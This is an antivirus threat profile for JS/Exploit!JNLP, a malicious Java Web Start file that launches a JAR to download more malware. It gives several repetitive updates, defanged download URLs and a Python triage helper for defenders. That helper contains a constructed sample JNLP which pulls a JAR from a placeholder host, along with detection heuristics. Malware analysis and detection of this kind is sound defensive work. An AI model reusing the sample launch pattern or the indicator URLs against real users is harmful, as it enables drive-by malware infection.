Virus Profile: JS/Exploit!JNLP

Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 5/15/2013
Date Added: 5/15/2013
Origin: Unknown
Length: Varies
Type: Trojan
Subtype: Script
DAT Required: 7076

Description

This is a Trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Indication of Infection

The exploit may download arbitrary files.
This exploit attempts to download and execute additional malware on the infected system.

Methods of Infection

The infection starts when the user visits a compromised website hosting the malicious .jar files.

Virus Characteristics

----------------------------------------Updated on July 26, 2013----------------------------

Aliases
  • Norman    -    generic/Blacole.UD
  • Avast     -    HTML:Downloader-FG
  • Microsoft -    Exploit:JS/Blacole.GB
Characteristics

JS/Exploit!JNLP is the detection for a malicious JNLP XML file that carries the parameter data and the class name used to execute the malicious JAR.

JNLP is a protocol, defined with an XML schema, that specifies how to launch Java Web applications. It consists of a set of rules defining exactly how the launching mechanism is implemented. A JNLP file includes information such as the location of the JAR package, the name of the application's main class, and any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE), which in turn downloads the application onto the user's machine and starts executing it.

The image below confirms that the Trojan executes the class “hw” and passes the encrypted URL as a parameter.

Upon successful execution, the JNLP tries to connect to the URL below in order to download the JAR and execute it using the encrypted URL above.
  • [Malicious Domain Name]/news/house_distributes_construct_distance.php?phlgyzg=goeeajoz&axjb=ilm

----------------------------------------Updated on July 23, 2013----------------------------

Aliases
  • Norman    -    generic/Blacole.UD
  • Avast     -    HTML:Downloader-FG
  • Microsoft -    Exploit:JS/Blacole.GB

JS/Exploit!JNLP is the detection for a malicious JNLP XML file that carries the parameter data and the class name used to execute the malicious JAR.


JNLP is a protocol, defined with an XML schema, that specifies how to launch Java Web applications. It consists of a set of rules defining exactly how the launching mechanism is implemented. A JNLP file includes information such as the location of the JAR package, the name of the application's main class, and any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE), which in turn downloads the application onto the user's machine and starts executing it.

The image below confirms that the Trojan executes the class “hw” and passes the encrypted URL as a parameter.

Upon successful execution, the JNLP tries to connect to the URL below in order to download the JAR and execute it using the encrypted URL above.

  • [Malicious Domain Name]/news/house_distributes_construct_distance.php?phlgyzg=goeeajoz&axjb=ilm

--------------------Updated on July 20, 2013---------------------------

Aliases
  • Avast     -    HTML:Downloader-FG
  • Norman    -    generic/Blacole.UD
  • Sunbelt   -    LooksLike.JNLP.ExploitLoader.a

JS/Exploit!JNLP is the detection for a malicious JNLP XML file that carries the parameter data and the class name used to execute the malicious JAR.

JNLP is a protocol, defined with an XML schema, that specifies how to launch Java Web applications. It consists of a set of rules defining exactly how the launching mechanism is implemented. A JNLP file includes information such as the location of the JAR package, the name of the application's main class, and any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE), which in turn downloads the application onto the user's machine and starts executing it.

The image below confirms that the Trojan executes the class “hw” and passes the encrypted URL as a parameter.

Upon successful execution, the JNLP tries to connect to the URLs below in order to download the JAR and execute it using the encrypted URL above.

  • hxxp://178.[Removed] 57/ac83334991034a44df82327c26eb7e75/ac83334991034a44df82327c26eb7e75/q.php?ef=1m:1j:30:2v:31&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&j=1f&tj=e&gv=e&jopa=4695008
  • hxxp://178.[Removed].57/ ac83334991034a44df82327c26eb7e75/q.php?vlqd=lgvvbanr&byf=qdrjqyf

At the time of analysis the site was down.

--------------------Updated on 6 June 2013---------------------------

JS/Exploit!JNLP is the detection for a malicious JNLP XML file that carries the parameter data and the class name used to execute the malicious JAR.

JNLP is a protocol, defined with an XML schema, that specifies how to launch Java Web applications. It consists of a set of rules defining exactly how the launching mechanism is implemented. A JNLP file includes information such as the location of the JAR package, the name of the application's main class, and any other parameters for the program. A properly configured browser passes JNLP files to a Java Runtime Environment (JRE), which in turn downloads the application onto the user's machine and starts executing it.

The image below confirms that the Trojan executes the class “wh” and passes the encrypted URL as a parameter.

Upon successful execution of the JAR, it tries to connect to the malicious URL to download other payloads.

---------------------Updated on 28 May 2013------------------------

JS/Exploit!JNLP is the detection for a malicious XML file that carries the parameter data used to execute the malicious JAR.

From the HTML, the malicious XML data is passed to an applet, which executes the JAR.

The image below confirms that the Trojan executes the class “wh” and passes the encrypted URL as a parameter to the applet.

Upon successful execution of the JAR, it tries to connect to the malicious encrypted URL to download other payloads.

-------------------------------------------------------------------------
JS/Exploit!JNLP is the detection for a malicious XML file that carries the parameter data used to execute the malicious JAR.

From the HTML, the malicious XML data is passed on to execute the malware.

The image below confirms that the Trojan executes the class “hw” and passes the encrypted URL as a parameter.

Upon successful execution of the JAR, it tries to connect to the malicious URL to download other payloads.
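The updates above all describe the same launch chain: a JNLP document names a codebase, the JAR to fetch, a short main class such as “hw”, and an opaque parameter value that the class decodes into a download URL. The following triage helper is an added example and is not McAfee's code or part of the detection signature; it parses a JNLP file with the standard library and reports the traits a defender would look for. The sample document, the hostnames (`example.invalid`, `cdn.example.invalid`) and the parameter value are constructed placeholders, and the thresholds in `assess` are assumptions chosen for illustration.

```python
"""Triage helper for JNLP launch files (added example, not McAfee's code).

Extracts what a JNLP file would make the JRE do (codebase, JAR locations,
main class, applet parameters) and flags traits the profile associates
with JS/Exploit!JNLP: a very short main-class name, a JAR fetched from a
host other than the codebase, and long opaque parameter values.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlparse

# Constructed sample: "hw" mirrors the class name in the profile; the
# hosts, jar name and encoded parameter are placeholders, not real IoCs.
SAMPLE_JNLP = """<?xml version="1.0"?>
<jnlp spec="1.0+" codebase="http://example.invalid/news/">
  <information><title>Update</title><vendor>n/a</vendor></information>
  <resources>
    <j2se version="1.6+"/>
    <jar href="http://cdn.example.invalid/q.jar" main="true"/>
  </resources>
  <applet-desc name="hw" main-class="hw" width="1" height="1">
    <param name="data" value="1m:1j:30:2v:31:1i:31:32:1g:1n:1h:1l:1l:1n:31"/>
  </applet-desc>
</jnlp>
"""

# Constructed benign sample: relative jar on the codebase host, a normal
# fully qualified main class, and no parameters.
BENIGN_JNLP = """<?xml version="1.0"?>
<jnlp spec="1.0+" codebase="http://example.invalid/app/">
  <information><title>App</title><vendor>Example</vendor></information>
  <resources><jar href="app.jar" main="true"/></resources>
  <application-desc main-class="com.example.App"/>
</jnlp>
"""

# Assumed heuristic: a long run of URL-safe characters with at least one
# digit and no spaces or dots looks like an encoded/obfuscated value.
OPAQUE_VALUE = re.compile(r"^[A-Za-z0-9+/=:]{16,}$")
MAX_SHORT_CLASS = 3  # assumed threshold for "obfuscated" class names


def parse_jnlp(text):
    """Return a dict describing what the JNLP would make the JRE do."""
    data = text.encode("utf-8") if isinstance(text, str) else text
    root = ET.fromstring(data)
    codebase = root.get("codebase", "")
    # jar hrefs may be relative to the codebase or absolute URLs
    jars = [urljoin(codebase, j.get("href", "")) for j in root.iter("jar")]
    desc = root.find("applet-desc")
    if desc is None:
        desc = root.find("application-desc")
    main_class = desc.get("main-class", "") if desc is not None else ""
    params = {p.get("name", ""): p.get("value", "") for p in root.iter("param")}
    return {"codebase": codebase, "jars": jars,
            "main_class": main_class, "params": params}


def assess(info):
    """Return a list of suspicious traits; an empty list means none found."""
    findings = []
    if 0 < len(info["main_class"]) <= MAX_SHORT_CLASS:
        findings.append("short obfuscated main class %r" % info["main_class"])
    codebase_host = urlparse(info["codebase"]).hostname
    for jar in info["jars"]:
        if urlparse(jar).hostname != codebase_host:
            findings.append("jar fetched from a different host: %s" % jar)
    for name, value in info["params"].items():
        if OPAQUE_VALUE.match(value) and any(c.isdigit() for c in value):
            findings.append("opaque parameter %r (%d chars)" % (name, len(value)))
    return findings


def triage(text):
    """Parse and assess a JNLP document in one step."""
    info = parse_jnlp(text)
    return info, assess(info)


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_JNLP), ("benign", BENIGN_JNLP)):
        info, findings = triage(doc)
        print(label, info["main_class"], info["jars"])
        for f in findings:
            print("  -", f)
```

Run against a JNLP pulled from a proxy log or mail gateway, the helper gives the analyst the codebase, the JAR URLs to block or hunt for, and the main class and parameters to compare with the characteristics above; the findings list is a triage aid, not a verdict, since legitimate Web Start applications can also use absolute JAR URLs.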

Removal Instructions

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be successfully removed when cleaning with the recommended engine and DAT combination (or higher).
